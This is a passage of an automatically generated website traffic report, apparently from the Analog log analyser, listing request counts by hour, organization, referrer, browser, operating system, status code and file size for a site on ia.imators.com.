class="R">17</td><td class="P">15</td><td class="bar"><img src="/images/barb8.png" alt="++++++++" /></td></tr> <tr><td class="x"> 4</td><td class="R">26</td><td class="P">20</td><td class="bar"><img src="/images/barb8.png" alt="++++++++++" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x"> 5</td><td class="R">27</td><td class="P">18</td><td class="bar"><img src="/images/barb8.png" alt="+++++++++" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x"> 6</td><td class="R">30</td><td class="P">23</td><td class="bar"><img src="/images/barb8.png" alt="++++++++++++" /><img src="/images/barb4.png" alt="" /></td></tr> <tr><td class="x"> 7</td><td class="R">19</td><td class="P">17</td><td class="bar"><img src="/images/barb8.png" alt="+++++++++" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x"> 8</td><td class="R">43</td><td class="P">31</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++" /></td></tr> <tr><td class="x"> 9</td><td class="R">32</td><td class="P">26</td><td class="bar"><img src="/images/barb8.png" alt="+++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">10</td><td class="R">29</td><td class="P">28</td><td class="bar"><img src="/images/barb8.png" alt="++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">11</td><td class="R">17</td><td class="P">17</td><td class="bar"><img src="/images/barb8.png" alt="+++++++++" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">12</td><td class="R">28</td><td class="P">22</td><td class="bar"><img src="/images/barb8.png" alt="+++++++++++" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">13</td><td class="R">32</td><td class="P">30</td><td class="bar"><img src="/images/barb8.png" alt="+++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">14</td><td class="R">16</td><td class="P">16</td><td class="bar"><img src="/images/barb8.png" alt="++++++++" /></td></tr> <tr><td class="x">15</td><td class="R">16</td><td class="P">10</td><td class="bar"><img src="/images/barb4.png" alt="+++++" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">16</td><td class="R">25</td><td class="P">13</td><td class="bar"><img src="/images/barb4.png" alt="+++++++" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">17</td><td class="R">7</td><td class="P">7</td><td class="bar"><img src="/images/barb4.png" alt="++++" /></td></tr> <tr><td class="x">18</td><td class="R">24</td><td class="P">18</td><td class="bar"><img src="/images/barb8.png" alt="+++++++++" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">19</td><td class="R">20</td><td class="P">13</td><td class="bar"><img src="/images/barb4.png" alt="+++++++" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">20</td><td class="R">10</td><td class="P">10</td><td class="bar"><img src="/images/barb4.png" alt="+++++" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">21</td><td class="R">15</td><td class="P">11</td><td class="bar"><img src="/images/barb4.png" alt="++++++" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">22</td><td class="R">199</td><td class="P">85</td><td class="bar"><img src="/images/barb32.png" alt="+++++++++++++++++++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">23</td><td class="R">38</td><td class="P">22</td><td class="bar"><img src="/images/barb8.png" alt="+++++++++++" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> </tbody></table> </div><div class="dom"><h2><a name="dom" id="dom">Domain Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | Domain Report | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p class="whatinc"> Listing domains, sorted by the amount of traffic.</p> <table> <thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="xl">domain</th></tr></thead> <tbody><tr><td class="R">757</td><td class="b">100%</td><td class="xl">[unresolved numerical addresses]</td></tr> </tbody></table> </div><div class="org"><h2><a name="org" id="org">Organization Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | Organization Report | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./org.png" alt="" /></p> <p class="whatinc"> Listing the top 20 organizations by the number of requests, sorted by the number of requests.</p> <table> <thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="xl">organization</th></tr></thead> <tbody><tr><td class="R">59</td><td class="b"> 8.53%</td><td class="xl">205.169</td></tr> <tr><td class="R">49</td><td class="b"> 5.38%</td><td class="xl">104</td></tr> <tr><td class="R">42</td><td class="b"> 5.80%</td><td class="xl">35</td></tr> <tr><td class="R">41</td><td class="b"> 5.58%</td><td class="xl">34</td></tr> <tr><td class="R">40</td><td class="b"> 6.91%</td><td class="xl">198.235</td></tr> <tr><td class="R">37</td><td class="b"> 7.23%</td><td class="xl">205.210</td></tr> <tr><td class="R">23</td><td class="b"> 3.56%</td><td class="xl">3</td></tr> <tr><td class="R">22</td><td class="b"> 3.54%</td><td class="xl">45</td></tr> <tr><td class="R">21</td><td class="b">10.30%</td><td class="xl">106</td></tr> <tr><td class="R">20</td><td class="b"> 2.83%</td><td class="xl">47</td></tr> <tr><td class="R">17</td><td class="b"> 2.22%</td><td class="xl">54</td></tr> <tr><td class="R">14</td><td class="b"> 0.59%</td><td class="xl">195.211</td></tr> <tr><td class="R">13</td><td class="b"> 1.03%</td><td class="xl">167.94</td></tr> <tr><td class="R">12</td><td class="b"> 0.99%</td><td class="xl">207.241</td></tr> <tr><td class="R">12</td><td class="b"> 0.99%</td><td class="xl">87</td></tr> <tr><td class="R">12</td><td class="b"> 0.99%</td><td class="xl">64.227</td></tr> <tr><td class="R">11</td><td class="b"> 1.23%</td><td class="xl">51</td></tr> <tr><td class="R">11</td><td class="b"> 1.46%</td><td class="xl">65.154</td></tr> <tr><td class="R">10</td><td class="b"> 1.27%</td><td class="xl">168.151</td></tr> <tr><td class="R">10</td><td class="b"> 1.65%</td><td class="xl">92</td></tr> <tr><td class="R">281</td><td class="b">27.93%</td><td class="xl">[not listed: 81 organizations]</td></tr> </tbody></table> </div><div class="failref"><h2><a name="failref" id="failref">Failed Referrer Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | Failed Referrer Report | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./failref.png" alt="" /></p> <p class="whatinc"> Listing referring URLs, sorted by the number of failed requests.</p> <table> <thead><tr><th class="R">#reqs</th><th class="xl">URL</th></tr></thead> <tbody><tr><td class="R">38</td><td class="xl"><a href="http://www.ia.imators.com/">http://www.ia.imators.com/</a></td></tr> <tr><td class="R">20</td><td class="xl"><a href="https://www.ia.imators.com/">https://www.ia.imators.com/</a></td></tr> <tr><td class="R">17</td><td class="xl"><a href="http://ia.imators.com/">http://ia.imators.com/</a></td></tr> <tr><td class="R">7</td><td class="xl"><a href="https://ia.imators.com/">https://ia.imators.com/</a></td></tr> <tr><td class="R">1</td><td class="xl"><a href="https://www.ia.imators.com/cgi-bin/">https://www.ia.imators.com/cgi-bin/</a></td></tr> </tbody></table> </div><div class="refsite"><h2><a name="refsite" id="refsite">Referring Site Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | Referring Site Report | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./refsite.png" alt="" /></p> <p class="whatinc"> Listing referring sites, sorted by the number of requests.</p> <table> <thead><tr><th class="R">#reqs</th><th class="xl">site</th></tr></thead> <tbody><tr><td class="R">75</td><td class="xl">http://www.ia.imators.com/</td></tr> <tr><td class="R">24</td><td class="xl">https://www.ia.imators.com/</td></tr> <tr><td class="R">4</td><td class="xl">https://ia.imators.com/</td></tr> <tr><td class="R">4</td><td class="xl">http://ia.imators.com/</td></tr> <tr><td class="R">3</td><td class="xl">https://www.google.com/</td></tr> <tr><td class="R">1</td><td class="xl">http://webdisk.birkenheaddrill.com/</td></tr> <tr><td class="R">1</td><td class="xl">https://158.193.145.151/</td></tr> <tr><td class="R">1</td><td class="xl">http://p7g6av7v.hongch.cn/</td></tr> <tr><td class="R">1</td><td class="xl">http://www.kaylanicoledigitalmarketing.com/</td></tr> <tr><td class="R">1</td><td class="xl">https://www.gestionpl.ca/</td></tr> <tr><td class="R">1</td><td class="xl">https://27.6.173.252/</td></tr> <tr><td class="R">1</td><td class="xl">http://175.27.248.198/</td></tr> <tr><td class="R">1</td><td class="xl">https://www.521qquu58.xyz/</td></tr> <tr><td class="R">1</td><td class="xl">http://uwcuapimanagement.configuration.azure-api.net/</td></tr> <tr><td class="R">1</td><td class="xl">https://clatsopcomputersolutions.com/</td></tr> <tr><td class="R">1</td><td class="xl">http://b.blog.davideramirez.com/</td></tr> <tr><td class="R">1</td><td class="xl">https://mail.mgbacgiang3s.com/</td></tr> <tr><td class="R">1</td><td class="xl">http://194.87.217.15/</td></tr> <tr><td class="R">1</td><td class="xl">https://parkerjconstruction.com/</td></tr> <tr><td class="R">1</td><td class="xl">http://175.24.179.113/</td></tr> <tr><td class="R">1</td><td class="xl">http://b.wjui.net/</td></tr> <tr><td class="R">1</td><td class="xl">http://156.237.46.172/</td></tr> </tbody></table> </div><div class="browrep"><h2><a name="browrep" id="browrep">Browser Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | Browser Report | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./browrep.png" alt="" /></p> <p class="whatinc"> Listing the top 40 browsers by the number of requests for pages, sorted by the number of requests for pages.</p> <table> <thead><tr><th class="R">#reqs</th><th class="P">#pages</th><th class="xl">browser</th></tr></thead> <tbody><tr><td class="R">43</td><td class="P">43</td><td class="xl">Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com</td></tr> <tr><td class="R">36</td><td class="P">36</td><td class="xl">Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36</td></tr> <tr><td class="R">35</td><td class="P">35</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36</td></tr> <tr><td class="R">31</td><td class="P">31</td><td class="xl">Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)</td></tr> <tr><td class="R">25</td><td class="P">25</td><td class="xl">Mozilla/5.0 \\(Windows NT 10.0\\; Win64\\; x64\\) AppleWebKit/537.36 \\(KHTML, like Gecko\\) Chrome/100.0.4896.60 Safari/537.36</td></tr> <tr><td class="R">22</td><td class="P">22</td><td class="xl">Mozilla/5.0 (X11; Linux i686; rv:109.0) Gecko/20100101 Firefox/120.0</td></tr> <tr><td class="R">16</td><td class="P">16</td><td class="xl">Go-http-client/1.1</td></tr> <tr><td class="R">15</td><td class="P">15</td><td class="xl">Mozilla/5.0 (compatible)</td></tr> <tr><td class="R">14</td><td class="P">14</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36</td></tr> <tr><td class="R">14</td><td class="P">14</td><td class="xl">Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)</td></tr> <tr><td class="R">13</td><td class="P">13</td><td class="xl">Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36</td></tr> <tr><td class="R">11</td><td class="P">11</td><td class="xl">Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)</td></tr> <tr><td class="R">10</td><td class="P">10</td><td class="xl">Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0</td></tr> <tr><td class="R">10</td><td class="P">10</td><td class="xl">Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11</td></tr> <tr><td class="R">16</td><td class="P">8</td><td class="xl">Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36</td></tr> <tr><td class="R">8</td><td class="P">8</td><td class="xl">Mozilla/5.0 (Linux; Android 6.0; HTC One M9 Build/MRA540537) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.3260.98 Mobile Safari/537.3</td></tr> <tr><td class="R">8</td><td class="P">8</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 (scanner.ducks.party)</td></tr> <tr><td class="R">38</td><td class="P">8</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36</td></tr> <tr><td class="R">6</td><td class="P">6</td><td class="xl">curl/7.61.1</td></tr> <tr><td class="R">14</td><td class="P">6</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36</td></tr> <tr><td class="R">6</td><td class="P">6</td><td class="xl">Mozilla/5.0 (compatible; wpbot/1.1; +https://forms.gle/ajBaxygz9jSR8p8G9)</td></tr> <tr><td class="R">11</td><td class="P">5</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.2; rb.gy/oupwis) Chrome/124.0.0.0 Safari/537.36</td></tr> <tr><td class="R">19</td><td class="P">4</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36</td></tr> <tr><td class="R">4</td><td class="P">4</td><td class="xl">Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Mobile Safari/537.36</td></tr> <tr><td class="R">4</td><td class="P">4</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3</td></tr> <tr><td class="R">4</td><td class="P">4</td><td class="xl">Mozilla/5.0 (Linux; Android 14) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.5993.80 Mobile Safari/537.36</td></tr> <tr><td class="R">12</td><td class="P">4</td><td class="xl">Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36</td></tr> <tr><td class="R">4</td><td class="P">4</td><td class="xl">Mozilla/5.0 (compatible; archive.org_bot +http://archive.org/details/archive.org_bot) Zeno/cfa2980 warc/v0.8.47</td></tr> <tr><td class="R">3</td><td class="P">3</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.75 Safari/537.36</td></tr> <tr><td class="R">9</td><td class="P">3</td><td class="xl">Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36</td></tr> <tr><td class="R">15</td><td class="P">3</td><td class="xl">Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/92.0.4515.159 Safari/537.36</td></tr> <tr><td class="R">3</td><td class="P">3</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36</td></tr> <tr><td class="R">3</td><td class="P">3</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36</td></tr> <tr><td class="R">3</td><td class="P">3</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36</td></tr> <tr><td class="R">3</td><td class="P">3</td><td class="xl">curl/7.88.1</td></tr> <tr><td class="R">3</td><td class="P">3</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36</td></tr> <tr><td class="R">2</td><td class="P">2</td><td class="xl">python-requests/2.27.1</td></tr> <tr><td class="R">2</td><td class="P">2</td><td class="xl">Mozilla/5.0 (compatible; archive.org_bot +http://archive.org/details/archive.org_bot) Zeno/08ba828 warc/v0.8.48</td></tr> <tr><td class="R">2</td><td class="P">2</td><td class="xl">Mozilla/5.0 (compatible; archive.org_bot +http://archive.org/details/archive.org_bot) Zeno/ae4878c warc/v0.8.39</td></tr> <tr><td class="R">2</td><td class="P">2</td><td class="xl">Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0</td></tr> <tr><td class="R">205</td><td class="P">55</td><td class="xl">[not listed: 115 browsers]</td></tr> </tbody></table> </div><div class="browsum"><h2><a name="browsum" id="browsum">Browser Summary</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | Browser Summary | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./browsum.png" alt="" /></p> <p class="whatinc"> Listing browsers with at least 1 request for a page, sorted by the number of requests for pages.</p> <table> <thead><tr><th class="N"> #</th><th class="R">#reqs</th><th class="P">#pages</th><th class="xl">browser</th></tr></thead> <tbody><tr><td class="N">1</td><td class="R">428</td><td class="P">260</td><td class="xl">Safari</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">393</td><td class="P">244</td><td class="xl"> Safari/537</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">10</td><td class="P">10</td><td class="xl"> Safari/535</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">17</td><td class="P">4</td><td class="xl"> Safari/604</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">4</td><td class="P">2</td><td class="xl"> Safari/534</td></tr> <tr><td class="N">2</td><td class="R">114</td><td class="P">90</td><td class="xl">Netscape (compatible)</td></tr> <tr><td class="N">3</td><td class="R">43</td><td class="P">43</td><td class="xl">Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">43</td><td class="P">43</td><td class="xl"> Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains</td></tr> <tr><td class="N">4</td><td class="R">45</td><td class="P">32</td><td class="xl">Firefox</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">28</td><td class="P">24</td><td class="xl"> Firefox/120</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">2</td><td class="P">2</td><td class="xl"> Firefox/83</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">2</td><td class="P">2</td><td class="xl"> Firefox/130</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">1</td><td class="P">1</td><td class="xl"> Firefox/24</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">1</td><td class="P">1</td><td class="xl"> Firefox/35</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">2</td><td class="P">1</td><td class="xl"> Firefox/4</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">5</td><td class="P">1</td><td class="xl"> Firefox/125</td></tr> <tr><td class="N">5</td><td class="R">16</td><td class="P">16</td><td class="xl">Go-http-client</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">16</td><td class="P">16</td><td class="xl"> Go-http-client/1</td></tr> <tr><td class="N">6</td><td class="R">9</td><td class="P">9</td><td class="xl">curl</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">9</td><td class="P">9</td><td class="xl"> curl/7</td></tr> <tr><td class="N">7</td><td class="R">12</td><td class="P">6</td><td class="xl">Mozilla</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">9</td><td class="P">4</td><td class="xl"> Mozilla/1</td></tr> <tr><td class="N">8</td><td class="R">2</td><td class="P">2</td><td class="xl">python-requests</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">2</td><td class="P">2</td><td class="xl"> python-requests/2</td></tr> <tr><td class="N">9</td><td class="R">11</td><td class="P">1</td><td class="xl">python-httpx</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">11</td><td class="P">1</td><td class="xl"> python-httpx/0</td></tr> <tr><td class="N">10</td><td class="R">1</td><td class="P">1</td><td class="xl">BlackBerry8320</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">1</td><td class="P">1</td><td class="xl"> BlackBerry8320/4</td></tr> <tr><td class="N">11</td><td class="R">3</td><td class="P">1</td><td class="xl">MSIE</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">2</td><td class="P">1</td><td class="xl"> MSIE/9</td></tr> <tr><td class="N"> </td><td class="R">20</td><td class="P">0</td><td class="xl">[not listed: 9 browsers]</td></tr> </tbody></table> </div><div class="os"><h2><a name="os" id="os">Operating System Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | Operating System Report | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./os.png" alt="" /></p> <p class="whatinc"> Listing operating systems, sorted by the number of requests for pages.</p> <table> <thead><tr><th class="N"> #</th><th class="R">#reqs</th><th class="P">#pages</th><th class="xl">OS</th></tr></thead> <tbody><tr><td class="N">1</td><td class="R">214</td><td class="P">162</td><td class="xl">OS unknown</td></tr> <tr><td class="N">2</td><td class="R">262</td><td class="P">151</td><td class="xl">Windows</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">210</td><td class="P">133</td><td class="xl"> Windows NT</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">45</td><td class="P">16</td><td class="xl"> Unknown Windows</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">1</td><td class="P">1</td><td class="xl"> Windows 2000</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">5</td><td class="P">1</td><td class="xl"> Windows XP</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">1</td><td class="P">0</td><td class="xl"> Windows CE</td></tr> <tr><td class="N">3</td><td class="R">117</td><td class="P">75</td><td class="xl">Unix</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">117</td><td class="P">75</td><td class="xl"> Linux</td></tr> <tr><td class="N">4</td><td class="R">110</td><td class="P">72</td><td class="xl">Macintosh</td></tr> <tr><td class="N">5</td><td class="R">1</td><td class="P">1</td><td class="xl">Symbian OS</td></tr> </tbody></table> </div><div class="code"><h2><a name="code" id="code">Status Code Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | Status Code Report | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./code.png" alt="" /></p> <p class="whatinc"> Listing status codes, sorted numerically.</p> <table> <thead><tr><th class="R">#reqs</th><th class="xl">status code</th></tr></thead> <tbody><tr><td class="R">757</td><td class="xl">200 OK</td></tr> <tr><td class="R">2</td><td class="xl">302 Document found elsewhere</td></tr> <tr><td class="R">88</td><td class="xl">403 Access forbidden</td></tr> <tr><td class="R">520</td><td class="xl">404 Document not found</td></tr> </tbody></table> </div><div class="size"><h2><a name="size" id="size">File Size Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | File Size Report | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./size.png" alt="" /></p> <table> <thead><tr><th class="x">size</th><th class="R">#reqs</th><th class="b">%bytes</th></tr></thead> <tbody><tr><td class="x"> 0</td><td class="R">11</td><td class="b"> </td></tr> <tr><td class="x"> 1B- 10B</td><td class="R">0</td><td class="b"> </td></tr> <tr><td class="x"> 11B- 100B</td><td class="R">34</td><td class="b"> 0.38%</td></tr> <tr><td class="x"> 101B- 1kB</td><td class="R">424</td><td class="b">31.33%</td></tr> <tr><td class="x"> 1kB- 10kB</td><td class="R">288</td><td class="b">68.30%</td></tr> </tbody></table> </div><div class="type"><h2><a name="type" id="type">File Type Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | File Type Report | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> 